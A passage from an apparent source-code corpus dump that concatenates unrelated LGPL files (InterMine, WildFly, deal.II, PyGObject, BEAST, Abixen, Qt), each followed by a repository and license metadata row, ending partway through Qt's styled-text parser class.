| jstourac/wildfly | connector/src/main/java/org/jboss/as/connector/deployers/ra/processors/RaXmlDeploymentProcessor.java | Java | lgpl-2.1 | 6,491 |
package org.intermine.model.testmodel.web;
/*
* Copyright (C) 2002-2016 FlyMine
*
* This code may be freely distributed and modified under the
* terms of the GNU Lesser General Public Licence. This should
* be distributed with the code. See the LICENSE file for more
* information or http://www.gnu.org/copyleft/lesser.html.
*
*/
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
import javax.servlet.http.HttpServletResponse;
import org.intermine.model.InterMineObject;
import org.intermine.objectstore.ObjectStore;
import org.intermine.web.logic.export.ExportException;
import org.intermine.web.logic.export.FieldExporter;
/**
* CommaFieldExporter class
*
* @author Kim Rutherford
*/
public class CommaFieldExporter implements FieldExporter
{
/**
* Example FieldExporter that splits the a String field at the first comma and outputs each bit
* on a new line.
* @param o the object of interest
* @param fieldName the field of the object
* @param os the ObjectStore that contains the object
* @param response The HTTP response we are creating - used to get the OutputStream to write to
* @throws ExportException if the application business logic throws an exception
*/
public void exportField(InterMineObject o, String fieldName,
@SuppressWarnings("unused") ObjectStore os,
HttpServletResponse response) throws ExportException {
try {
response.setContentType("text/plain");
response.setHeader("Content-Disposition ", "inline; filename=" + fieldName + ".txt");
OutputStream outputStream = response.getOutputStream();
PrintStream printStream = new PrintStream(outputStream);
String fieldValue = (String) o.getFieldValue(fieldName);
int commaPos = fieldValue.indexOf(",");
String firstPart = fieldValue.substring(0, commaPos + 1);
String secondPart = fieldValue.substring(commaPos + 1).trim();
printStream.println(firstPart);
printStream.println(secondPart);
printStream.close();
outputStream.close();
} catch (IllegalAccessException e) {
throw new ExportException("unexpected IO error while exporting", e);
} catch (IOException e) {
throw new ExportException("unexpected IO error while exporting", e);
}
}
}
| zebrafishmine/intermine | testmodel/webapp/main/src/org/intermine/model/testmodel/web/CommaFieldExporter.java | Java | lgpl-2.1 | 2,444 |
/*
* JBoss, Home of Professional Open Source.
* Copyright 2016, Red Hat, Inc., and individual contributors
* as indicated by the @author tags. See the copyright.txt file in the
* distribution for a full listing of individual contributors.
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this software; if not, write to the Free
* Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA, or see the FSF site: http://www.fsf.org.
*/
package org.jboss.as.test.xts.suspend.wsat;
import com.arjuna.wst.Prepared;
import com.arjuna.wst.SystemException;
import com.arjuna.wst.Volatile2PCParticipant;
import com.arjuna.wst.Vote;
import com.arjuna.wst.WrongStateException;
import org.jboss.logging.Logger;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
/**
 * Volatile 2PC participant used by the WS-AT suspend tests. Every protocol
 * callback is appended to a shared, static invocation log so that tests can
 * assert exactly which lifecycle methods the coordinator invoked, and in
 * what order.
 *
 * @author <a href="mailto:gytis@redhat.com">Gytis Trikleris</a>
 */
public class TransactionParticipant implements Volatile2PCParticipant {

    private static final Logger LOGGER = Logger.getLogger(TransactionParticipant.class);

    // Shared across all instances: names of the protocol callbacks in
    // invocation order. NOTE(review): not synchronized — assumes the test
    // harness drives callbacks from a single thread; confirm before reuse.
    private static final List<String> INVOCATIONS = new ArrayList<>();

    private final String id;

    public TransactionParticipant(String id) {
        this.id = id;
    }

    /** Clears the shared invocation log between test runs. */
    public static void resetInvocations() {
        LOGGER.infof("resetting invocations %s", INVOCATIONS);
        INVOCATIONS.clear();
    }

    /** Returns a read-only view of the callbacks recorded so far. */
    public static List<String> getInvocations() {
        LOGGER.infof("returning invocations %s", INVOCATIONS);
        return Collections.unmodifiableList(INVOCATIONS);
    }

    public String getId() {
        return id;
    }

    /** Records the prepare callback and always votes {@link Prepared}. */
    @Override
    public Vote prepare() throws WrongStateException, SystemException {
        INVOCATIONS.add("prepare");
        LOGGER.infof("preparing call on %s", this);
        return new Prepared();
    }

    /** Records the commit callback; no other work is done. */
    @Override
    public void commit() throws WrongStateException, SystemException {
        INVOCATIONS.add("commit");
        LOGGER.infof("commit call on %s", this);
    }

    /** Records the rollback callback; no other work is done. */
    @Override
    public void rollback() throws WrongStateException, SystemException {
        INVOCATIONS.add("rollback");
        LOGGER.infof("rollback call on %s", this);
    }

    /** Records the unknown-status callback. */
    @Override
    public void unknown() throws SystemException {
        INVOCATIONS.add("unknown");
        LOGGER.infof("unknown call on %s", this);
    }

    /** Records the error callback. */
    @Override
    public void error() throws SystemException {
        INVOCATIONS.add("error");
        LOGGER.infof("error call on %s", this);
    }

    @Override
    public String toString() {
        // Renders identically to
        // String.format("%s{id='%s', INVOCATIONS=%s}", simpleName, id, INVOCATIONS).
        return this.getClass().getSimpleName()
                + "{id='" + id + "', INVOCATIONS=" + INVOCATIONS + '}';
    }
}
| xasx/wildfly | testsuite/integration/xts/src/test/java/org/jboss/as/test/xts/suspend/wsat/TransactionParticipant.java | Java | lgpl-2.1 | 3,206 |
// ---------------------------------------------------------------------
//
// Copyright (C) 2012 - 2015 by the deal.II authors
//
// This file is part of the deal.II library.
//
// The deal.II library is free software; you can use it, redistribute
// it, and/or modify it under the terms of the GNU Lesser General
// Public License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// The full text of the license can be found in the file LICENSE at
// the top level of the deal.II distribution.
//
// ---------------------------------------------------------------------
// tests for the BlockMask class
//
// here: test BlockMask::size()
#include "../tests.h"
#include <deal.II/fe/block_mask.h>
void test ()
{
AssertThrow (BlockMask(12, false).size() == 12, ExcInternalError());
AssertThrow (BlockMask().size() == 0, ExcInternalError());
deallog << "OK" << std::endl;
}
// Entry point: redirect deallog (at 4 significant digits) into the file
// "output", which the deal.II test harness diffs against the expected
// result, then run the actual check.
int main()
{
  std::ofstream logfile ("output");
  deallog << std::setprecision (4);
  deallog.attach(logfile);

  test();
}
| kalj/dealii | tests/fe/block_mask_04.cc | C++ | lgpl-2.1 | 1,091 |
package org.intermine.bio.postprocess;
/*
* Copyright (C) 2002-2016 FlyMine
*
* This code may be freely distributed and modified under the
* terms of the GNU Lesser General Public Licence. This should
* be distributed with the code. See the LICENSE file for more
* information or http://www.gnu.org/copyleft/lesser.html.
*
*/
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Set;
import junit.framework.TestCase;
import org.apache.commons.collections.IteratorUtils;
import org.intermine.model.InterMineObject;
import org.intermine.model.bio.BioEntity;
import org.intermine.model.bio.Chromosome;
import org.intermine.model.bio.DataSource;
import org.intermine.model.bio.Gene;
import org.intermine.model.bio.IntergenicRegion;
import org.intermine.model.bio.Location;
import org.intermine.model.bio.Organism;
import org.intermine.objectstore.ObjectStore;
import org.intermine.objectstore.ObjectStoreException;
import org.intermine.objectstore.ObjectStoreWriter;
import org.intermine.objectstore.ObjectStoreWriterFactory;
import org.intermine.objectstore.query.Query;
import org.intermine.objectstore.query.QueryClass;
import org.intermine.objectstore.query.SingletonResults;
import org.intermine.util.DynamicUtil;
import org.intermine.metadata.Util;
/**
 * Tests for the IntergenicRegionUtil post-processing class: verifies that
 * intergenic regions are created in the gaps between genes on a chromosome,
 * and that each created region carries the expected references (chromosome,
 * organism, location, adjacent genes, up/downstream region links).
 *
 * @author Kim Rutherford
 */
public class IntergenicRegionsTest extends TestCase
{
    // Writer for the on-disk test ObjectStore; opened in setUp, closed in tearDown.
    private ObjectStoreWriter osw;
    private Organism organism = null;
    private DataSource dataSource;

    public IntergenicRegionsTest(String arg) {
        super(arg);
        // Skeleton Organism and DataSource objects shared by all test methods.
        organism = (Organism) DynamicUtil.createObject(Collections.singleton(Organism.class));
        dataSource = (DataSource) DynamicUtil.createObject(Collections.singleton(DataSource.class));
        dataSource.setName("FlyMine");
    }

    public void setUp() throws Exception {
        osw = ObjectStoreWriterFactory.getObjectStoreWriter("osw.bio-test");
        osw.getObjectStore().flushObjectById();
        osw.store(organism);
        osw.store(dataSource);
    }

    /** Deletes every InterMineObject from the store so each test starts clean. */
    public void tearDown() throws Exception {
        if (osw.isInTransaction()) {
            osw.abortTransaction();
        }
        Query q = new Query();
        QueryClass qc = new QueryClass(InterMineObject.class);
        q.addFrom(qc);
        q.addToSelect(qc);
        SingletonResults res = osw.getObjectStore().executeSingleton(q);
        Iterator resIter = res.iterator();
        osw.beginTransaction();
        while (resIter.hasNext()) {
            InterMineObject o = (InterMineObject) resIter.next();
            osw.delete(o);
        }
        osw.commitTransaction();
        osw.close();
    }

    /**
     * Counts the intergenic regions produced for each chromosome fixture:
     * chrX (5 genes, gaps at both ends and between genes) yields 5 regions;
     * chrI (genes touching both chromosome ends, plus overlapping genes)
     * yields only 3.
     */
    public void testCreateIntergenicRegionFeatures() throws Exception {
        IntergenicRegionUtil iru = new IntergenicRegionUtil(osw);
        List chrXgeneLocList = new ArrayList();
        Map chrXlocMap = new HashMap();
        Integer chrXId = createChrX(chrXgeneLocList, chrXlocMap, 1000);
        Iterator irIter = iru.createIntergenicRegionFeatures(new HashSet(chrXgeneLocList),
                chrXlocMap, chrXId);
        {
            Set intergenicRegions = new HashSet(IteratorUtils.toList(irIter));
            assertEquals(5, intergenicRegions.size());
        }
        List chr1geneLocList = new ArrayList();
        Map chr1locMap = new HashMap();
        Integer chr1Id = createChr1(chr1geneLocList, chr1locMap, 2000);
        irIter = iru.createIntergenicRegionFeatures(new HashSet(chr1geneLocList), chr1locMap,
                chr1Id);
        {
            Set intergenicRegions = new HashSet(IteratorUtils.toList(irIter));
            assertEquals(3, intergenicRegions.size());
        }
    }

    /**
     * Runs the full post-process over both chromosome fixtures, then re-reads
     * the stored IntergenicRegion objects and checks every reference on each:
     * chromosome/organism/length/data sets, the location fields, the
     * adjacentGenes collection, the gene up/downstream region links (taking
     * strand into account), and finally the generated primary identifiers.
     */
    public void testCreateIntergenicRegionFeaturesRefs() throws Exception {
        IntergenicRegionUtil iru = new IntergenicRegionUtil(osw);
        List chrXgeneLocList = new ArrayList();
        Map chrXlocMap = new HashMap();
        createChrX(chrXgeneLocList, chrXlocMap, 3000);
        List chr1geneLocList = new ArrayList();
        Map chr1locMap = new HashMap();
        Integer chr1Id = createChr1(chr1geneLocList, chr1locMap, 4000);
        iru.createIntergenicRegionFeatures();
        ObjectStore os = osw.getObjectStore();
        os.flushObjectById();
        Query q = new Query();
        QueryClass qc = new QueryClass(IntergenicRegion.class);
        q.addFrom(qc);
        q.addToSelect(qc);
        SingletonResults res = os.executeSingleton(q);
        Iterator resIter = res.iterator();
        {
            Set intergenicRegions = new HashSet(IteratorUtils.toList(resIter));
            Iterator irIter = intergenicRegions.iterator();
            Set actualIdentifiers = new HashSet();
            while(irIter.hasNext()) {
                IntergenicRegion ir = (IntergenicRegion) irIter.next();
                assertNotNull(ir.getChromosome());
                assertNotNull(ir.getOrganism());
                assertNotNull(ir.getLength());
                assertTrue(ir.getLength().intValue() > 0);
                assertEquals(1, ir.getDataSets().size());
                Location loc = ir.getChromosomeLocation();
                assertNotNull(loc);
                assertNotNull(loc.getStart());
                assertNotNull(loc.getEnd());
                assertNotNull(loc.getStrand());
                assertEquals(1, loc.getDataSets().size());
                int locStart = loc.getStart().intValue();
                // Check the gene (if any) immediately before this region.
                if (locStart > 0) {
                    Integer newLoc = new Integer(locStart - 1);
                    Collection prevGeneIds;
                    if (ir.getChromosome().getId().equals(chr1Id)) {
                        prevGeneIds = getByLoc(newLoc, chr1locMap);
                    } else {
                        prevGeneIds = getByLoc(newLoc, chrXlocMap);
                    }
                    Iterator prevGeneIdsIter = prevGeneIds.iterator();
                    while (prevGeneIdsIter.hasNext()) {
                        Gene prevGene = (Gene) os.getObjectById((Integer) prevGeneIdsIter.next());
                        assertTrue(prevGene.getUpstreamIntergenicRegion() != null
                                || prevGene.getDownstreamIntergenicRegion() != null);
                        Set adjacentGenes = new HashSet(ir.getAdjacentGenes());
                        assertTrue(adjacentGenes.contains(prevGene));
                        // On the forward strand the region after a gene is its
                        // downstream region; on the reverse strand, upstream.
                        if ("1".equals(loc.getStrand())) {
                            IntergenicRegion nextIntergenicRegion =
                                    prevGene.getDownstreamIntergenicRegion();
                            Integer id = nextIntergenicRegion.getId();
                            assertEquals(id, ir.getId());
                        } else {
                            assertEquals(prevGene.getUpstreamIntergenicRegion().getId(), ir.getId());
                        }
                    }
                }
                int locEnd = loc.getEnd().intValue();
                // Check the gene(s) immediately after this region.
                if (locEnd < ir.getChromosome().getLength().intValue()) {
                    Integer newLoc = new Integer(locEnd + 1);
                    Collection nextGeneIds;
                    if (ir.getChromosome().getId().equals(chr1Id)) {
                        nextGeneIds = getByLoc(newLoc, chr1locMap);
                    } else {
                        nextGeneIds = getByLoc(newLoc, chrXlocMap);
                    }
                    assertTrue(nextGeneIds.size() > 0);
                    Iterator nextGeneIdsIter = nextGeneIds.iterator();
                    while (nextGeneIdsIter.hasNext()) {
                        Gene nextGene = (Gene) os.getObjectById((Integer) nextGeneIdsIter.next());
                        if ("1".equals(loc.getStrand())) {
                            assertTrue(ir.getAdjacentGenes().contains(nextGene));
                            assertEquals(nextGene.getUpstreamIntergenicRegion().getId(), ir.getId());
                        } else {
                            assertTrue(ir.getAdjacentGenes().contains(nextGene));
                            assertEquals(nextGene.getDownstreamIntergenicRegion().getId(), ir.getId());
                        }
                    }
                }
                actualIdentifiers.add(ir.getPrimaryIdentifier());
            }
            // Identifiers encode chromosome and 1-based inclusive coordinates.
            Set expectedIdentifiers =
                    new HashSet(Arrays.asList(new Object[] {
                        "intergenic_region_chrX_1..100",
                        "intergenic_region_chrX_201..300",
                        "intergenic_region_chrX_401..500",
                        "intergenic_region_chrX_601..700",
                        "intergenic_region_chrX_951..1000",
                        "intergenic_region_chrI_101..300",
                        "intergenic_region_chrI_401..500",
                        "intergenic_region_chrI_901..1800",
                    }));
            assertEquals(expectedIdentifiers, actualIdentifiers);
        }
    }

    /**
     * Looks up the genes registered at a given coordinate in a location map
     * and returns their database IDs.
     */
    private Collection getByLoc(Integer newLoc, Map chrlocMap) {
        Set chrGeneList = (Set) chrlocMap.get(newLoc);
        if (chrGeneList == null) {
            chrGeneList = new HashSet();
        }
        List retList = new ArrayList();
        Iterator iter = chrGeneList.iterator();
        while (iter.hasNext()) {
            retList.add(((Gene) iter.next()).getId());
        }
        // return IDs that will be looked up in the on disk objectstore rather than using the
        // Genes created by createChrX() and createChr1(), which have null IDs
        return retList;
    }

    /**
     * Builds and stores chromosome X (length 1000) with five genes, filling
     * geneLocList with the gene Locations and chrXlocMap with
     * start/end-coordinate -> gene entries. Returns the chromosome ID.
     */
    private Integer createChrX(List geneLocList, Map chrXlocMap, int idStart) throws ObjectStoreException {
        Chromosome chr =
                (Chromosome) DynamicUtil.createObject(Collections.singleton(Chromosome.class));
        chr.setPrimaryIdentifier("X");
        chr.setLength(new Integer(1000));
        chr.setId(new Integer(101));
        chr.setOrganism(organism);
        Set toStore = new HashSet();
        toStore.add(chr);
        // Each row: { id offset, start, end } — last two genes overlap.
        int [][] geneInfo = {
            { 0, 101, 200 },
            { 1, 301, 400 },
            { 2, 501, 600 },
            { 3, 701, 900 },
            { 4, 801, 950 },
        };
        Gene[] genes = new Gene[geneInfo.length];
        Location[] geneLocs = new Location[geneInfo.length];
        for (int i = 0; i < genes.length; i++) {
            genes[i] = (Gene) DynamicUtil.createObject(Collections.singleton(Gene.class));
            int geneId = geneInfo[i][0] + idStart;
            int start = geneInfo[i][1];
            int end = geneInfo[i][2];
            genes[i].setId(new Integer(geneId));
            genes[i].setLength(new Integer(end - start + 1));
            genes[i].setChromosome(chr);
            geneLocs[i] = createLocation(chr, genes[i], "1", start, end, Location.class);
            geneLocs[i].setId(new Integer(100 + geneId));
            genes[i].setChromosomeLocation(geneLocs[i]);
            Util.addToSetMap(chrXlocMap, geneLocs[i].getStart(), genes[i]);
            Util.addToSetMap(chrXlocMap, geneLocs[i].getEnd(), genes[i]);
        }
        toStore.addAll(Arrays.asList(genes));
        geneLocList.addAll(Arrays.asList(geneLocs));
        toStore.addAll(geneLocList);
        Iterator iter = toStore.iterator();
        while (iter.hasNext()) {
            InterMineObject o = (InterMineObject) iter.next();
            osw.store(o);
        }
        return chr.getId();
    }

    /**
     * Builds and stores chromosome I (length 2000) with six genes, covering
     * the edge cases noted inline. Same output contract as createChrX.
     */
    private Integer createChr1(List geneLocList, Map chr1locMap, int idStart) throws ObjectStoreException {
        Chromosome chr =
                (Chromosome) DynamicUtil.createObject(Collections.singleton(Chromosome.class));
        chr.setPrimaryIdentifier("I");
        chr.setLength(new Integer(2000));
        chr.setId(new Integer(102));
        chr.setOrganism(organism);
        Set toStore = new HashSet();
        toStore.add(chr);
        int [][] geneInfo = {
            // test special case - gene starts at first base of chromosome
            { 0, 1, 100 },
            // test creating two genes with the same start and/or end base
            { 1, 301, 400 },
            { 2, 301, 400 },
            { 3, 501, 800 },
            { 4, 701, 900 },
            // test special case - gene ends at last base of chromosome
            { 5, 1801, 2000 },
        };
        Gene[] genes = new Gene[geneInfo.length];
        Location[] geneLocs = new Location[geneInfo.length];
        for (int i = 0; i < genes.length; i++) {
            genes[i] = (Gene) DynamicUtil.createObject(Collections.singleton(Gene.class));
            int geneId = geneInfo[i][0] + idStart;
            int start = geneInfo[i][1];
            int end = geneInfo[i][2];
            genes[i].setId(new Integer(geneId));
            genes[i].setLength(new Integer(end - start + 1));
            genes[i].setChromosome(chr);
            geneLocs[i] = createLocation(chr, genes[i], "1", start, end, Location.class);
            geneLocs[i].setId(new Integer(100 + geneId));
            genes[i].setChromosomeLocation(geneLocs[i]);
            Util.addToSetMap(chr1locMap, geneLocs[i].getStart(), genes[i]);
            Util.addToSetMap(chr1locMap, geneLocs[i].getEnd(), genes[i]);
        }
        toStore.addAll(Arrays.asList(genes));
        geneLocList.addAll(Arrays.asList(geneLocs));
        toStore.addAll(geneLocList);
        Iterator iter = toStore.iterator();
        while (iter.hasNext()) {
            InterMineObject o = (InterMineObject) iter.next();
            osw.store(o);
        }
        return chr.getId();
    }

    /**
     * Creates (but does not store) a Location of the given class linking
     * subject to object with the given strand and 1-based coordinates.
     */
    private Location createLocation(BioEntity object, BioEntity subject, String strand,
            int start, int end, Class<?> locationClass) {
        Location loc = (Location) DynamicUtil.createObject(Collections.singleton(locationClass));
        loc.setLocatedOn(object);
        loc.setFeature(subject);
        loc.setStrand(strand);
        loc.setStart(new Integer(start));
        loc.setEnd(new Integer(end));
        return loc;
    }
}
| JoeCarlson/intermine | bio/postprocess/test/src/org/intermine/bio/postprocess/IntergenicRegionsTest.java | Java | lgpl-2.1 | 14,309 |
from __future__ import print_function
from gi.repository import GObject
class C(GObject.GObject):
    """GObject subclass declaring two signals via the decorator API."""

    @GObject.Signal(arg_types=(int,))
    def my_signal(self, arg):
        """Decorator style signal which uses the method name as signal name and
        the method as the closure.

        Note that with python3 annotations can be used for argument types as follows:
            @GObject.Signal
            def my_signal(self, arg:int):
                pass
        """
        print("C: class closure for `my_signal' called with argument", arg)

    @GObject.Signal
    def noarg_signal(self):
        """Decoration of a signal using all defaults and no arguments."""
        print("C: class closure for `noarg_signal' called")
class D(C):
    """Subclass of C overriding the default closure for ``my_signal``."""

    def do_my_signal(self, arg):
        # The do_<signal-name> virtual-method convention replaces C's class
        # closure; chain up explicitly so C's closure still runs.
        print("D: class closure for `my_signal' called. Chaining up to C")
        C.my_signal(self, arg)
def my_signal_handler(obj, arg, *extra):
    """Plain-function signal handler; ``extra`` receives the user data
    passed to connect()."""
    print(f"handler for `my_signal' called with argument {arg} and extra args {extra}")
# Demonstration: emitting a signal runs the class closure (C's, or D's
# override which chains up) and then any connected handlers, which receive
# the signal arguments followed by the connect()-time user data (1, 2, 3).
inst = C()
inst2 = D()
inst.connect("my_signal", my_signal_handler, 1, 2, 3)
inst.connect("noarg_signal", my_signal_handler, 1, 2, 3)
inst.emit("my_signal", 42)
inst.emit("noarg_signal")
inst2.emit("my_signal", 42)
| GNOME/pygobject | examples/signal.py | Python | lgpl-2.1 | 1,236 |
/*
* FiniteSetParameter.java
*
* Copyright (c) 2002-2015 Alexei Drummond, Andrew Rambaut and Marc Suchard
*
* This file is part of BEAST.
* See the NOTICE file distributed with this work for additional
* information regarding copyright ownership and licensing.
*
* BEAST is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* BEAST is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with BEAST; if not, write to the
* Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
* Boston, MA 02110-1301 USA
*/
package dr.inference.model;
/**
 * A parameter intended to take values from a finite set.
 *
 * NOTE(review): this class is an unfinished skeleton — most methods are
 * auto-generated stubs returning 0/null or doing nothing, and the
 * {@code indicator} field used by storeValues()/restoreValues() is never
 * assigned anywhere in this class, so those calls would throw a
 * NullPointerException unless it is set elsewhere. Confirm before use.
 *
 * @author Marc A. Suchard
 */
public class FiniteSetParameter extends Parameter.Abstract implements VariableListener {

    public void variableChangedEvent(Variable variable, int index, ChangeType type) {
        //To change body of implemented methods use File | Settings | File Templates.
    }

    // Delegates state saving to the indicator parameter (see class NOTE).
    protected void storeValues() {
        indicator.storeParameterValues();
    }

    // Delegates state restoration to the indicator parameter (see class NOTE).
    protected void restoreValues() {
        indicator.restoreParameterValues();
    }

    protected void acceptValues() {
        //To change body of implemented methods use File | Settings | File Templates.
    }

    protected void adoptValues(Parameter source) {
        //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * Stub: always returns 0 regardless of dimension.
     *
     * @param dim the index of the parameter dimension of interest
     * @return the parameter's scalar value in the given dimension
     */
    public double getParameterValue(int dim) {
        return 0; //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * sets the scalar value in the given dimension of this parameter
     *
     * @param dim the index of the dimension to set
     * @param value the value to set
     */
    public void setParameterValue(int dim, double value) {
        //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * sets the scalar value in the given dimensin of this parameter to val, without firing any events
     *
     * @param dim the index of the dimension to set
     * @param value the value to set
     */
    public void setParameterValueQuietly(int dim, double value) {
        //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * sets the scalar value in the given dimensin of this parameter to val,
     * and notifies that values in all dimension have been changed
     *
     * @param dim the index of the dimension to set
     * @param value the value to set
     */
    public void setParameterValueNotifyChangedAll(int dim, double value) {
        //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * Stub: always returns null.
     *
     * @return the name of this parameter
     */
    public String getParameterName() {
        return null; //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * Adds new bounds to this parameter
     *
     * @param bounds to add
     */
    public void addBounds(Bounds<Double> bounds) {
        //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * Stub: always returns null.
     *
     * @return the intersection of all bounds added to this parameter
     */
    public Bounds<Double> getBounds() {
        return null; //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * Adds an extra dimension at the given index
     *
     * @param index Index of the dimension to add
     * @param value value to save at end of new array
     */
    public void addDimension(int index, double value) {
        //To change body of implemented methods use File | Settings | File Templates.
    }

    /**
     * Removes the specified dimension from parameter
     *
     * @param index Index of dimension to lose
     * @return the value of the dimension removed
     */
    public double removeDimension(int index) {
        return 0; //To change body of implemented methods use File | Settings | File Templates.
    }

    // NOTE(review): never assigned in this class — see class-level comment.
    private Parameter indicator;
}
| adamallo/beast-mcmc | src/dr/inference/model/FiniteSetParameter.java | Java | lgpl-2.1 | 4,575 |
/**
* Copyright (c) 2010-present Abixen Systems. All rights reserved.
*
* This library is free software; you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the Free
* Software Foundation; either version 2.1 of the License, or (at your option)
* any later version.
*
* This library is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
* details.
*/
package com.abixen.platform.common.util;
/**
 * Shared model-layer constants: field length limits used by validation
 * across the platform, plus common separator characters.
 */
public final class ModelKeys {

    //FIXME - what is name?
    public static final int NAME_MIN_LENGTH = 5;
    public static final int NAME_MAX_LENGTH = 300;

    public static final int USERNAME_MIN_LENGTH = 3;
    public static final int USERNAME_MAX_LENGTH = 32;

    public static final int PASSWORD_MAX_LENGTH = 60;

    public static final int FIRSTNAME_MIN_LENGTH = 2;
    public static final int FIRSTNAME_MAX_LENGTH = 64;

    public static final int LASTNAME_MIN_LENGTH = 2;
    public static final int LASTNAME_MAX_LENGTH = 64;

    public static final int ROLE_NAME_MIN_LENGTH = 5;
    public static final int ROLE_NAME_MAX_LENGTH = 20;

    public static final int FILTER_NAME_MIN_LENGTH = 3;
    public static final int FILTER_NAME_MAX_LENGTH = 100;

    /**
     * Maximum stored length of a registration IP address:
     * an IPv4-mapped IPv6 address needs up to 45 bytes.
     */
    public static final int REGISTRATION_IP_MAX_LENGTH = 45;

    public static final char COMMA = ',';
    public static final char TAB = '\t';

    // Constants holder: suppress the implicit public constructor so the
    // class cannot be instantiated.
    private ModelKeys() {
    }
}
| rbharath26/abixen-platform | abixen-platform-common/src/main/java/com/abixen/platform/common/util/ModelKeys.java | Java | lgpl-2.1 | 1,608 |
/****************************************************************************
**
** Copyright (C) 2013 Digia Plc and/or its subsidiary(-ies).
** Contact: http://www.qt-project.org/legal
**
** This file is part of the QtQuick module of the Qt Toolkit.
**
** $QT_BEGIN_LICENSE:LGPL$
** Commercial License Usage
** Licensees holding valid commercial Qt licenses may use this file in
** accordance with the commercial license agreement provided with the
** Software or, alternatively, in accordance with the terms contained in
** a written agreement between you and Digia. For licensing terms and
** conditions see http://qt.digia.com/licensing. For further information
** use the contact form at http://qt.digia.com/contact-us.
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
** In addition, as a special exception, Digia gives you certain additional
** rights. These rights are described in the Digia Qt LGPL Exception
** version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
**
** GNU General Public License Usage
** Alternatively, this file may be used under the terms of the GNU
** General Public License version 3.0 as published by the Free Software
** Foundation and appearing in the file LICENSE.GPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU General Public License version 3.0 requirements will be
** met: http://www.gnu.org/copyleft/gpl.html.
**
**
** $QT_END_LICENSE$
**
****************************************************************************/
#include <QStack>
#include <QVector>
#include <QPainter>
#include <QTextLayout>
#include <QDebug>
#include <qmath.h>
#include "qquickstyledtext_p.h"
#include <QQmlContext>
/*
QQuickStyledText supports few tags:
<b></b> - bold
<strong></strong> - bold
<i></i> - italic
<br> - new line
<p> - paragraph
<u> - underlined text
<font color="color_name" size="1-7"></font>
<h1> to <h6> - headers
<a href=""> - anchor
<ol type="">, <ul type=""> and <li> - ordered and unordered lists
<pre></pre> - preformated
<img src=""> - images
The opening and closing tags must be correctly nested.
*/
QT_BEGIN_NAMESPACE
Q_GUI_EXPORT int qt_defaultDpi();
// Private implementation for QQuickStyledText: a single-pass parser that
// walks the markup string and fills a QTextLayout with plain text plus
// character-format ranges for the supported tags (see comment above).
class QQuickStyledTextPrivate
{
public:
    enum ListType { Ordered, Unordered };
    enum ListFormat { Bullet, Disc, Square, Decimal, LowerAlpha, UpperAlpha, LowerRoman, UpperRoman };

    // One entry per nested <ol>/<ul>; level counts the <li> items emitted.
    struct List {
        int level;
        ListType type;
        ListFormat format;
    };

    QQuickStyledTextPrivate(const QString &t, QTextLayout &l,
                            QList<QQuickStyledTextImgTag*> &imgTags,
                            const QUrl &baseUrl,
                            QQmlContext *context,
                            bool preloadImages,
                            bool *fontSizeModified)
        : text(t), layout(l), imgTags(&imgTags), baseFont(layout.font()), baseUrl(baseUrl), hasNewLine(false), nbImages(0), updateImagePositions(false)
        , preFormat(false), prependSpace(false), hasSpace(true), preloadImages(preloadImages), fontSizeModified(fontSizeModified), context(context)
    {
    }

    void parse();
    void appendText(const QString &textIn, int start, int length, QString &textOut);
    bool parseTag(const QChar *&ch, const QString &textIn, QString &textOut, QTextCharFormat &format);
    bool parseCloseTag(const QChar *&ch, const QString &textIn, QString &textOut);
    void parseEntity(const QChar *&ch, const QString &textIn, QString &textOut);
    bool parseFontAttributes(const QChar *&ch, const QString &textIn, QTextCharFormat &format);
    bool parseOrderedListAttributes(const QChar *&ch, const QString &textIn);
    bool parseUnorderedListAttributes(const QChar *&ch, const QString &textIn);
    bool parseAnchorAttributes(const QChar *&ch, const QString &textIn, QTextCharFormat &format);
    void parseImageAttributes(const QChar *&ch, const QString &textIn, QString &textOut);
    QPair<QStringRef,QStringRef> parseAttribute(const QChar *&ch, const QString &textIn);
    QStringRef parseValue(const QChar *&ch, const QString &textIn);
    void setFontSize(int size, QTextCharFormat &format);

    // Advances ch past consecutive whitespace (stops at the terminating null).
    inline void skipSpace(const QChar *&ch) {
        while (ch->isSpace() && !ch->isNull())
            ++ch;
    }

    static QString toAlpha(int value, bool upper);
